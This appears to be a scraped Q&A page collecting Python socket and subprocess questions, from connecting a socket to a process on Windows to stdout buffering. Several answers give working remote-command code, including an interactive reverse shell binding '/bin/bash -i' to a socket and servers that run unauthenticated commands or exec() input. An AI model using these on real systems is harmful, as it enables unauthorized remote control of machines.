Python connect socket to process - python

I have a (very) simple web server I wrote in C and I want to test it. I wrote it so it takes data on stdin and sends out on stdout. How would I connect the input/output of a socket (created with socket.accept()) to the input/output of a process created with subprocess.Popen?
Sounds simple, right? Here's the killer: I'm running Windows.
Can anyone help?
Here's what I've tried:
Passing the client object itself as stdin/out to subprocess.Popen. (It never hurts to try.)
Passing socket.makefile() results as stdin/out to subprocess.Popen.
Passing the socket's file number to os.fdopen().
Also, in case the question was unclear, here's a slimmed-down version of my code:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('', PORT))
sock.listen(5)
cli, addr = sock.accept()
p = subprocess.Popen([PROG])
#I want to connect 'p' to the 'cli' socket so whatever it sends on stdout
#goes to the client and whatever the client sends goes to its stdin.
#I've tried:
p = subprocess.Popen([PROG], stdin = cli.makefile("r"), stdout = cli.makefile("w"))
p = subprocess.Popen([PROG], stdin = cli, stdout = cli)
p = subprocess.Popen([PROG], stdin = os.fdopen(cli.fileno(), "r"), stdout = os.fdopen(cli.fileno(), "w"))
#but all of them give me either "Bad file descriptor" or "The handle is invalid".

I had the same issue and tried the same way to bind the socket, also on windows. The solution I came out with was to share the socket and bind it on the process to stdin and stdout. My solutions are completely in python but I guess that they are easily convertible.
import socket, subprocess
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('', PORT))
sock.listen(5)
cli, addr = sock.accept()
process = subprocess.Popen([PROG], stdin=subprocess.PIPE)
process.stdin.write(cli.share(process.pid))
process.stdin.flush()
# you can now use `cli` as client normally
And in the other process:
import sys, os, socket
sock = socket.fromshare(os.read(sys.stdin.fileno(), 372))
sys.stdin = sock.makefile("r")
sys.stdout = sock.makefile("w")
# stdin and stdout now write to `sock`
The 372 is the len of a measured socket.share call. I don't know if this is constant, but it worked for me. This is possible only in windows, as the share function is only available on that OS.

Related

Python socket.accept() blocking code before call?

I am trying to learn Python sockets and have hit a snare with the socket.accept() method. As I understand the method, once I call accept, the thread will sit and wait for an incoming connection (blocking all following code). However, in the code below, which I got from https://docs.python.org/2/library/socket.html and am using localhost. I added a print('hello') to the first line of the server. Yet the print doesn't appear until after I disconnect the client. Why is this? Why does accept seem to run before my print yet after I bind the socket?
# Echo server program
import socket
print('hello') # This doesn't print until I disconnect the client
HOST = 'localhost'
PORT = 50007
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
conn, addr = s.accept()
print 'Connected by', addr
while 1:
data = conn.recv(1024)
if not data: break
conn.sendall(data)
conn.close()
# Echo client program
import socket
HOST = 'localhost' # The remote host
PORT = 50007 # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall('Hello, world')
data = s.recv(1024)
s.close()
print 'Received', repr(data)
You are likely using an output device on a system that Python's IO doesn't recognize as interactive. As a workaround, you can add sys.stdout.flush() after the print.
The standard output is a buffered stream, meaning that when you print something, the output sticks around in an internal buffer until you print enough data to fill the whole buffer (unlikely in a small program, the buffet is several kilobytes in size), or until the program exits, when all such buffers are automatically flushed. Normally when the output is a terminal service, the IO layer automatically switches to line buffering, where the buffer is also flushed whenever a newline character is printed (and which the print statement inserts automatically).
For some reason, that doesn't work on your system, and you have to flush explicitly. Another option is to run python -u, which should force unbuffered standard streams.

Python true interactive remote reverse shell

I'm trying to create a true interactive remote shell using Python. When I say true, I mean I don't want to just execute a single command and send the results- I have that working already. I also don't want to abstract executing single commands by having the server interpret directory changes or what not.
I am trying to have a client start an interactive /bin/bash and have the server send commands which are then executed by the same persistent shell. For instance, so if I run cd /foo/bar then pwd would return /foo/bar because I would be interacting with the same bash shell.
Here's some slimmed down example code that currently only will do single command execution...
# client.py
import socket
import subprocess
s = socket.socket()
s.connect(('localhost', 1337))
while True:
cmd = s.recv(1024)
# single command execution currently (not interactive shell)
results = subprocess.Popen(cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
s.sendall(results)
# server.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)
conn, _ = s.accept()
while True:
cmd = raw_input('> ').rstrip()
conn.send(cmd)
results = conn.recv(4096)
print results
I've tried many solutions none of which have worked. The subprocess module had a communication method, but it kills the shell after a single command. I'd really like to be able to accomplish this with stdlib, but I've looked at the pexpect module after reading this thread. However, I can't get that to work either? It also doesn't look like it's primary use case is for creating an interactive shell, but rather catching specific command line output for interaction. I can't even get single command execution working with pexpect...
import pexpect, sys
proc = pexpect.spawn('/bin/bash')
proc.logfile = sys.stdout
proc.expect('$ ')
proc.sendline('pwd\n')
If anyone can help it would be appreciated, I feel like there could be a way to multi-thread and spawn off a /bin/bash -i with subprocess and then some how write to stdin and read from stdout? Thanks in advance, and sorry for the length.
Try this code:
# client.py
import socket
import subprocess
s = socket.socket()
s.connect(('localhost', 1337))
process = subprocess.Popen(['/bin/bash', '-i'],
stdout=s.makefile('wb'), stderr=subprocess.STDOUT,
stdin=s.makefile('rb'))
process.wait()
# server.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)
conn, _ = s.accept()
fp = conn.makefile('wb')
proc1 = subprocess.Popen('cat', stdin=conn.makefile('rb'))
while True:
fp.write(sys.stdin.read(4096))
proc1.wait()

Python. Redirect stdout to a socket

I run my script on computer "A". Then I connect to computer "A" from computer "B" through my script. I send my message to computer "A" and my script runs it with an exec() instruction.
I want to see the result of executing my message on computer "A", through a socket on computer "B".
I tried to change sys.stdout = socket_response but had a error: "Socket object has no attribute write()"
So, how can I redirect standard output (for print or exec()) from computer "A" to computer "B" through socket connection?
It will be some kind of 'python interpreter' into my script.
SORRY, I CAN'T ANSWER MY OWN QUESTION WITHOUT REPUTATION
Thanks to all!
I use a simple way, which #Torxed advised me of. Here's my pseudo-code (it's just an example, not my real script)
#-*-coding:utf-8-*-
import socket
import sys
class stdout_():
def __init__(self, sock_resp):
self.sock_resp = sock_resp
def write(self, mes):
self.sock_resp.send(mes)
MY_IP = 'localhost'
MY_PORT = 31337
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Start server")
old_out = sys.stdout
srv.bind((MY_IP, MY_PORT))
srv.listen(0)
sock_resp, addr_resp = srv.accept()
new_out = stdout_(sock_resp)
sys.stdout = new_out
#sys.stdout = sock_resp ### sock_object has no attribute 'write'
while 1:
try:
a = sock_resp.recv(1024)
exec(a)
except socket.timeout:
#print('server timeout!!' + '\n')
continue
I connected to script with Putty and sent "print 'abc'" and then I received the answer 'abc'.
There is the makefile function in Python's socket class:
socket.makefile(mode='r', buffering=None, *, encoding=None,
errors=None, newline=None)
Return a file object associated with the socket. The exact returned
type depends on the arguments given to makefile(). These arguments are
interpreted the same way as by the built-in open() function.
Closing the file object won’t close the socket unless there are no
remaining references to the socket. The socket must be in blocking
mode; it can have a timeout, but the file object’s internal buffer may
end up in a inconsistent state if a timeout occurs.
You can read how to use it in Mark Lutz's book (chapter 12, "Making Sockets Look Like Files and Streams").
An example from the book (the idea is simple: make a file object from a socket with socket.makefile and link sys.stdout with it):
def redirectOut(port=port, host=host):
"""
connect caller's standard output stream to a socket for GUI to listen
start caller after listener started, else connect fails before accept
"""
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, port)) # caller operates in client mode
file = sock.makefile('w') # file interface: text, buffered
sys.stdout = file # make prints go to sock.send
return sock # if caller needs to access it raw
Server side:
from subprocess import Popen, STDOUT, PIPE
from socket import socket
from time import sleep
server_sock = socket()
server_sock.bind(('', 8000))
server_sock.listen(4)
def close_process(p):
p.stdin.close()
p.stdout.close()
while 1:
try:
client, client_address = server_sock.accept()
data = client.recv(8192)
except:
break
# First, we open a handle to the external command to be run.
process = Popen(data.decode('utf-8'), shell=True, stdout=PIPE, stdin=PIPE, stderr=STDOUT)
# Wait for the command to finish
# (.poll() will return the exit code, None if it's still running)
while process.poll() == None:
sleep(0.025)
# Then we send whatever output the command gave us back via the socket
# Python3: sockets never convert data from byte objects to strings,
# so we'll have to do this "manually" in case you're confused from Py2.X
try:
client.send(bytes(process.stdout.read(), 'UTF-8'))
except:
pass
# And finally, close the stdout/stdin of the process,
# otherwise you'll end up with "to many filehandles openened" in your OS.
close_process(process)
client.close()
server_sock.close()
This assumes Python3.
If no one else have a better way of just redirecting output to a socket from a process, this is a solution you could work with.

Python client-server script hangs until I press [enter]

I have a basic client-server script in Python using sockets. The server binds to a specific port and waits for a client connection. When a client connects, they are presented with a raw_input prompt that sends the entered commands to a subproc on the server and pipes the output back to the client.
Sometimes when I execute commands from the client, the output will hang and not present me with the raw_input prompt until I press the [enter] key.
At first I thought this might have been a buffer problem but it happens when I use commands with a small output, like 'clear' or 'ls', etc.
The client code:
import os, sys
import socket
from base64 import *
import time
try:
HOST = sys.argv[1]
PORT = int(sys.argv[2])
except IndexError:
print("You must specify a host IP address and port number!")
print("usage: ./handler_client.py 192.168.1.4 4444")
sys.exit()
socksize = 4096
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.connect((HOST, PORT))
print("[+] Connection established!")
print("[+] Type ':help' to view commands.")
except:
print("[!] Connection error!")
sys.exit(2)
while True:
data = server.recv(socksize)
cmd = raw_input(data)
server.sendall(str(cmd))
server.close()
Server code:
import os,sys
import socket
import time
from subprocess import Popen,PIPE,STDOUT,call
HOST = ''
PORT = 4444
socksize = 4096
activePID = []
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.bind((HOST, PORT))
conn.listen(5)
print("Listening on TCP port %s" % PORT)
def reaper():
while activePID:
pid,stat = os.waitpid(0, os.WNOHANG)
if not pid: break
activePID.remove(pid)
def handler(connection):
time.sleep(3)
while True:
cmd = connection.recv(socksize)
proc = Popen(cmd,
shell=True,
stdout=PIPE,
stderr=PIPE,
stdin=PIPE,
)
stdout, stderr = proc.communicate()
if cmd == ":killme":
connection.close()
sys.exit(0)
elif proc:
connection.send( stdout )
connection.send("\nshell => ")
connection.close()
os._exit(0)
def accept():
while 1:
global connection
connection, address = conn.accept()
print "[!] New connection!"
connection.send("\nshell => ")
reaper()
childPid = os.fork() # forks the incoming connection and sends to conn handler
if childPid == 0:
handler(connection)
else:
activePID.append(childPid)
accept()
The problem I see is that the final loop in the client only does one server.recv(socksize), and then it calls raw_input(). If that recv() call does not obtain all of the data sent by the server in that single call, then it also won't collect the prompt that follows the command output and therefore won't show that next prompt. The uncollected input will sit in the socket until you enter the next command, and then it will be collected and shown. (In principle it could take many recv() calls to drain the socket and get to the appended prompt, not just two calls.)
If this is what's happening then you would hit the problem if the command sent back more than one buffer's worth (4KB) of data, or if it generated output in small chunks spaced out in time so that the server side could spread that data over multiple sends that are not coalesced quickly enough for the client to collect them all in a single recv().
To fix this, you need have the client do as many recv() calls as it takes to completely drain the socket. So you need to come up with a way for the client to know that the socket has been drained of everything that the server is going to send in this interaction.
The easiest way to do this is to have the server add boundary markers into the data stream and then have the client inspect those markers to discover when the final data from the current interaction has been collected. There are various ways to do this, but I'd probably have the server insert a "this is the length of the following chunk of data" marker ahead of every chunk it sends, and send a marker with a length of zero after the final chunk.
The client-side main loop then becomes:
forever:
read a marker;
if the length carried in the marker is zero then
break;
else
read exactly that many bytes;.
Note that the client must be sure to recv() the complete marker before it acts on it; stuff can come out of a stream socket in lumps of any size, completely unrelated to the size of the writes that sent that stuff into the socket at the sender's side.
You get to decide whether to send the marker as variable-length text (with a distinctive delimiter) or as fixed-length binary (in which case you have to worry about endian issues if the client and server can be on different systems). You also get to decide whether the client should show each chunk as it arrives (obviously you can't use raw_input() to do that) or whether it should collect all of the chunks and show the whole thing in one blast after the final chunk has been collected.

Python sending command over a socket

I'm having a bit of trouble. I want to create a simple program that connects to the server and executes a command using subprocess then returns the result to the client. It's simple but I can't get it to work. Right now this is what I have:
client:
import sys, socket, subprocess
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = sys.argv[1]
port = int(sys.argv[2])
socksize = 1024
conn.connect((host, port))
while True:
shell = raw_input("$ ")
conn.send(shell)
data = conn.recv(socksize)
#msglen = len(data)
output = data
iotype = subprocess.PIPE
cmd = ['/bin/sh', '-c', shell]
proc = subprocess.Popen(cmd, stdout=iotype).wait()
stdout,stderr = proc.communicate()
conn.send(stdout)
print(output)
if proc.returncode != 0:
print("Error")
server:
import sys, socket, subprocess
host = ''
port = 50106
socksize = 1024
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
print("Server started on port: %s" %port)
s.listen(1)
print("Now listening...\n")
conn, addr = s.accept()
while True:
print 'New connection from %s:%d' % (addr[0], addr[1])
data = conn.recv(socksize)
cmd = ['/bin/sh', '-c', data]
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE).wait()
stdout,stderr = cmd.communicate()
if not data:
break
elif data == 'killsrv':
sys.exit()
Danger, Will Robinson!!!
Do you really want to send commands in clear text without authentication over the network? It is very, very dangerous.
Do it over SSH with paramiko.
Alright I've heard this answer too many times. I don't want to use SSH I'm just building it to learn more about sockets. I'm not going to actually use this if I want to send commands to a system. – AustinM
There is no way I could infer this noble quest from your question. :-)
The sockets module is a thin layer over the posix library; plain sockets is tedious and hard to get right. As of today (2014), asynchronous I/O and concurrency are not among Python's strongest traits - 3.4 is starting to change that but libraries will lag behind for a while. My advice is to spent your time learning some higher level API like Twisted (twistedmatrix.com/trac). If you are really interested in the low level stuff, dive in the project source.
Alright. Any idea on how I could use twisted for this type of thing? – AustinM
Look at twistedmatrix.com/documents/current/core/examples/#auto2
Well I can understand your frustration Austin; I was in the same boat. However trial and error at last worked out. Hopefully you were looking for this:
print "Command is:",command
op = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
if op:
output=str(op.stdout.read())
print "Output:",output
conn.sendall(output)
else:
error=str(op.stderr.read())
print "Error:",error
conn.sendall(error)
It's unclear why you are using subprocess.Popen() for the same command in both the client and the server. Here's an outline of what I would try to do (pseudocode):
client
while True:
read command from user
send command to server
wait for and then read response from server
print response to user
server
while True:
wait for and then read command from client
if command is "killsrv", exit
execute command and capture output
send output to client
The problem with your code is this line (in both client and server):
proc = subprocess.Popen(cmd, stdout=iotype).wait()
stdout,stderr = proc.communicate()
You are calling wait on the Popen object, which means that the variable proc is getting an int (returned by wait) instead of a Popen object. You can just get rid of the wait -- since communicate waits for the process to end before returning, and you aren't checking the exit code anyway, you don't need to call it.
Then, in your client, I don't think you even need the subprocess calls, unless you're running some command that the server is sending back.

Categories